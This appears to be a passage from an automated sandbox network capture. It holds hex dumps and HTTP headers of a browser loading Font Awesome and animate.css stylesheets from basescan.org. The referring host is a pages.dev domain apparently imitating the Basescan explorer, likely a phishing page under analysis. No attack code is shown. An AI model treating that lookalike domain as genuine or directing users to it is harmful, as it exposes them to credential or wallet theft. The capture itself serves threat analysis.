                                                                                                                                                                                                                                              Data Ascii: arrow-alt-square-down:before{content:"\f350"}.fa-arrow-alt-square-left:before{content:"\f351"}.fa-arrow-alt-square-right:before{content:"\f352"}.fa-arrow-alt-square-up:before{content:"\f353"}.fa-arrow-alt-to-bottom:before{content:"\f34a"}.fa-arrow-alt-to-
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 33 33 37 22 7d 2e 66 61 2d 61 72 72 6f 77 73 2d 61 6c 74 2d 76 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 33 38 22 7d 2e 66 61 2d 61 72 72 6f 77 73 2d 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 65 22 7d 2e 66 61 2d 61 72 72 6f 77 73 2d 76 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 64 22 7d 2e 66 61 2d 61 72 74 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 61 22 7d 2e 66 61 2d 61 73 73 69 73 74 69 76 65 2d 6c 69 73 74 65 6e 69 6e 67 2d 73 79 73 74 65 6d 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 32 22 7d 2e 66 61 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 36 39 22 7d 2e 66 61 2d 61 73 79 6d 6d
                                                                                                                                                                                                                                              Data Ascii: 337"}.fa-arrows-alt-v:before{content:"\f338"}.fa-arrows-h:before{content:"\f07e"}.fa-arrows-v:before{content:"\f07d"}.fa-artstation:before{content:"\f77a"}.fa-assistive-listening-systems:before{content:"\f2a2"}.fa-asterisk:before{content:"\f069"}.fa-asymm
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 7d 2e 66 61 2d 62 61 6c 61 6e 63 65 2d 73 63 61 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 34 65 22 7d 2e 66 61 2d 62 61 6c 61 6e 63 65 2d 73 63 61 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 35 22 7d 2e 66 61 2d 62 61 6c 61 6e 63 65 2d 73 63 61 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 36 22 7d 2e 66 61 2d 62 61 6c 6c 2d 70 69 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 65 22 7d 2e 66 61 2d 62 61 6c 6c 6f 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 33 32 22 7d 2e 66 61 2d 62 61 6c 6c 6f 74 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 33 33 22 7d 2e 66 61 2d 62 61 6e 3a 62
                                                                                                                                                                                                                                              Data Ascii: }.fa-balance-scale:before{content:"\f24e"}.fa-balance-scale-left:before{content:"\f515"}.fa-balance-scale-right:before{content:"\f516"}.fa-ball-pile:before{content:"\f77e"}.fa-ballot:before{content:"\f732"}.fa-ballot-check:before{content:"\f733"}.fa-ban:b
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 66 31 62 35 22 7d 2e 66 61 2d 62 65 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 33 22 7d 2e 66 61 2d 62 65 6c 6c 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 34 38 22 7d 2e 66 61 2d 62 65 6c 6c 2d 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 66 61 22 7d 2e 66 61 2d 62 65 6c 6c 2d 70 6c 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 34 39 22 7d 2e 66 61 2d 62 65 6c 6c 2d 73 63 68 6f 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 35 22 7d 2e 66 61 2d 62 65 6c 6c 2d 73 63 68 6f 6f 6c 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 36 22 7d 2e 66 61 2d 62 65 6c 6c 2d 73 6c 61 73 68 3a 62 65
                                                                                                                                                                                                                                              Data Ascii: f1b5"}.fa-bell:before{content:"\f0f3"}.fa-bell-exclamation:before{content:"\f848"}.fa-bell-on:before{content:"\f8fa"}.fa-bell-plus:before{content:"\f849"}.fa-bell-school:before{content:"\f5d5"}.fa-bell-school-slash:before{content:"\f5d6"}.fa-bell-slash:be
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6d 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 32 22 7d 2e 66 61 2d 62 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 37 22 7d 2e 66 61 2d 62 6f 6e 65 2d 62 72 65 61 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 38 22 7d 2e 66 61 2d 62 6f 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 63 22 7d 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 64 22 7d 2e 66 61 2d 62 6f 6f 6b 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 39 22 7d 2e 66 61 2d 62 6f 6f 6b 2d 64 65 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 62 37 22 7d 2e 66 61 2d 62 6f 6f 6b 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 7b
                                                                                                                                                                                                                                              Data Ascii: mb:before{content:"\f1e2"}.fa-bone:before{content:"\f5d7"}.fa-bone-break:before{content:"\f5d8"}.fa-bong:before{content:"\f55c"}.fa-book:before{content:"\f02d"}.fa-book-alt:before{content:"\f5d9"}.fa-book-dead:before{content:"\f6b7"}.fa-book-heart:before{


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              23192.168.2.549753104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC629OUTGET /assets/vendor/animate.css/animate.min.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90465
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cIt8ISW9No3qtpmx1aeV43H8vAZF5J0QQQLx8oEIhemb81vJzUAKCgLoFdYSHC3V07Xdjqu%2F2F9dRXmqtK%2B632mwsxpMYNfn7XaDAmmhGDM5h3ywcocvlwvuD93seg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2bead91c46d-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC571INData Raw: 37 63 38 33 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0d 0a 0d 0a 2f 2a 21 0d 0a 20 2a 20 61 6e 69 6d 61 74 65 2e 63 73 73 20 2d 68 74 74 70 3a 2f 2f 64 61 6e 65 64 65 6e 2e 6d 65 2f 61 6e 69 6d 61 74 65 0d 0a 20 2a 20 56 65 72 73 69 6f 6e 20 2d 20 33 2e 37 2e 30 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0d 0a 20 2a 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 38 20 44 61 6e 69 65 6c 20 45 64 65 6e 0d 0a 20 2a 2f 0d 0a 0d 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 7b 30 25 2c 32 30 25 2c 35 33 25 2c 38 30 25 2c 74
                                                                                                                                                                                                                                              Data Ascii: 7c83@charset "UTF-8";/*! * animate.css -http://daneden.me/animate * Version - 3.7.0 * Licensed under the MIT license - http://opensource.org/licenses/MIT * * Copyright (c) 2018 Daniel Eden */@-webkit-keyframes bounce{0%,20%,53%,80%,t
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 37 35 35 2c 2e 30 35 2c 2e 38 35 35 2c 2e 30 36 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 33 30 70 78 2c 30 29 7d 37 30 25 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 37 35 35 2c 2e 30 35 2c 2e 38 35 35 2c 2e 30 36 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 31 35 70 78 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 37 35 35 2c 2e 30 35 2c 2e 38 35 35 2c 2e 30 36 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74
                                                                                                                                                                                                                                              Data Ascii: on:cubic-bezier(.755,.05,.855,.06);transform:translate3d(0,-30px,0)}70%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);-webkit-transform:translate3d(0,-15px,0);animation-timing-function:cubic-bezier(.755,.05,.855,.06);transform:translat
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 20 70 75 6c 73 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 7d 35 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 30 35 2c 31 2e 30 35 2c 31 2e 30 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 30 35 2c 31 2e 30 35 2c 31 2e 30 35 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 75 6c 73 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28
                                                                                                                                                                                                                                              Data Ascii: pulse{0%{-webkit-transform:scaleX(1);transform:scaleX(1)}50%{-webkit-transform:scale3d(1.05,1.05,1.05);transform:scale3d(1.05,1.05,1.05)}to{-webkit-transform:scaleX(1);transform:scaleX(1)}}@keyframes pulse{0%{-webkit-transform:scaleX(1);transform:scaleX(
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 2c 31 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 7d 7d 2e 72 75 62 62 65 72 42 61 6e 64 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 72 75 62 62 65 72 42 61 6e 64 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 72 75 62 62 65 72 42 61 6e 64 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 73 68 61 6b 65 7b 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 7d 31 30 25 2c 33 30 25 2c 35 30 25 2c 37 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72
                                                                                                                                                                                                                                              Data Ascii: ,1)}to{-webkit-transform:scaleX(1);transform:scaleX(1)}}.rubberBand{-webkit-animation-name:rubberBand;animation-name:rubberBand}@-webkit-keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:tr
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 6f 74 61 74 65 59 28 2d 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 36 70 78 29 20 72 6f 74 61 74 65 59 28 2d 39 64 65 67 29 7d 31 38 2e 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 20 72 6f 74 61 74 65 59 28 37 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 20 72 6f 74 61 74 65 59 28 37 64 65 67 29 7d 33 31 2e 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 33 70 78 29 20 72 6f 74 61 74 65 59 28 2d 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 33 70 78 29 20 72 6f 74 61 74 65 59 28 2d 35 64 65 67 29 7d 34 33 2e 35 25 7b
                                                                                                                                                                                                                                              Data Ascii: rotateY(-9deg);transform:translateX(-6px) rotateY(-9deg)}18.5%{-webkit-transform:translateX(5px) rotateY(7deg);transform:translateX(5px) rotateY(7deg)}31.5%{-webkit-transform:translateX(-3px) rotateY(-5deg);transform:translateX(-3px) rotateY(-5deg)}43.5%{
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 7d 31 30 25 2c 32 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 39 2c 2e 39 2c 2e 39 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 39 2c 2e 39 2c 2e 39 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 7d 33 30 25 2c 35 30 25 2c 37 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 31 2c 31 2e 31 2c 31 2e 31 29 20 72 6f 74 61 74 65 28 33 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 31 2c 31 2e 31 2c 31 2e 31 29 20 72 6f 74 61 74 65 28 33 64 65 67 29 7d 34 30 25 2c 36 30 25 2c 38 30 25 7b 2d 77 65 62 6b 69 74 2d 74
                                                                                                                                                                                                                                              Data Ascii: );transform:scaleX(1)}10%,20%{-webkit-transform:scale3d(.9,.9,.9) rotate(-3deg);transform:scale3d(.9,.9,.9) rotate(-3deg)}30%,50%,70%,90%{-webkit-transform:scale3d(1.1,1.1,1.1) rotate(3deg);transform:scale3d(1.1,1.1,1.1) rotate(3deg)}40%,60%,80%{-webkit-t
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 29 20 72 6f 74 61 74 65 28 32 64 65 67 29 7d 37 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 2d 35 25 2c 30 2c 30 29 20 72 6f 74 61 74 65 28 2d 31 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 2d 35 25 2c 30 2c 30 29 20 72 6f 74 61 74 65 28 2d 31 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 77 6f 62 62 6c 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 7d 31
                                                                                                                                                                                                                                              Data Ascii: ) rotate(2deg)}75%{-webkit-transform:translate3d(-5%,0,0) rotate(-1deg);transform:translate3d(-5%,0,0) rotate(-1deg)}to{-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes wobble{0%{-webkit-transform:translateZ(0);transform:translateZ(0)}1
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 65 67 29 7d 36 36 2e 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 58 28 2d 2e 37 38 31 32 35 64 65 67 29 20 73 6b 65 77 59 28 2d 2e 37 38 31 32 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 58 28 2d 2e 37 38 31 32 35 64 65 67 29 20 73 6b 65 77 59 28 2d 2e 37 38 31 32 35 64 65 67 29 7d 37 37 2e 37 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 58 28 2e 33 39 30 36 32 35 64 65 67 29 20 73 6b 65 77 59 28 2e 33 39 30 36 32 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 58 28 2e 33 39 30 36 32 35 64 65 67 29 20 73 6b 65 77 59 28 2e 33 39 30 36 32 35 64 65 67 29 7d 38 38 2e 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 58 28 2d 2e 31 39 35 33 31 32 35
                                                                                                                                                                                                                                              Data Ascii: eg)}66.6%{-webkit-transform:skewX(-.78125deg) skewY(-.78125deg);transform:skewX(-.78125deg) skewY(-.78125deg)}77.7%{-webkit-transform:skewX(.390625deg) skewY(.390625deg);transform:skewX(.390625deg) skewY(.390625deg)}88.8%{-webkit-transform:skewX(-.1953125
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 33 29 7d 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 32 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 33 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 33 29 7d 37 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 68 65 61 72 74 42 65 61 74 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 31 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61
                                                                                                                                                                                                                                              Data Ascii: orm:scale(1.3)}28%{-webkit-transform:scale(1);transform:scale(1)}42%{-webkit-transform:scale(1.3);transform:scale(1.3)}70%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes heartBeat{0%{-webkit-transform:scale(1);transform:scale(1)}14%{-webkit-tra
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 31 2c 2e 33 35 35 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 31 35 2c 2e 36 31 2c 2e 33 35 35 2c 31 29 7d 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 33 2c 2e 33 2c 2e 33 29 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 33 2c 2e 33 2c 2e 33 29 7d 32 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 31 2c 31 2e 31 2c 31 2e 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 31 2e 31 2c 31 2e 31 2c 31 2e 31 29 7d 34 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 33 64 28 2e 39 2c 2e 39 2c 2e 39
                                                                                                                                                                                                                                              Data Ascii: 1,.355,1);animation-timing-function:cubic-bezier(.215,.61,.355,1)}0%{-webkit-transform:scale3d(.3,.3,.3);opacity:0;transform:scale3d(.3,.3,.3)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.549752104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC633OUTGET /assets/vendor/hs-megamenu/src/hs.megamenu.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Content-Length: 2945
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=4058
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90461
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XkvIfRDGl%2BFdpx07Q82JrRnIubkdOIK24M1PckszVM%2FFeSF845PCs4Ypv%2FX5oOv7S0WDXNzC%2FRc1ZAHrd0446QqBpEGweO6Ejsdd8e%2FaAXJNCYBN4D7PFTqKnWpiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2beabfbc468-EWR
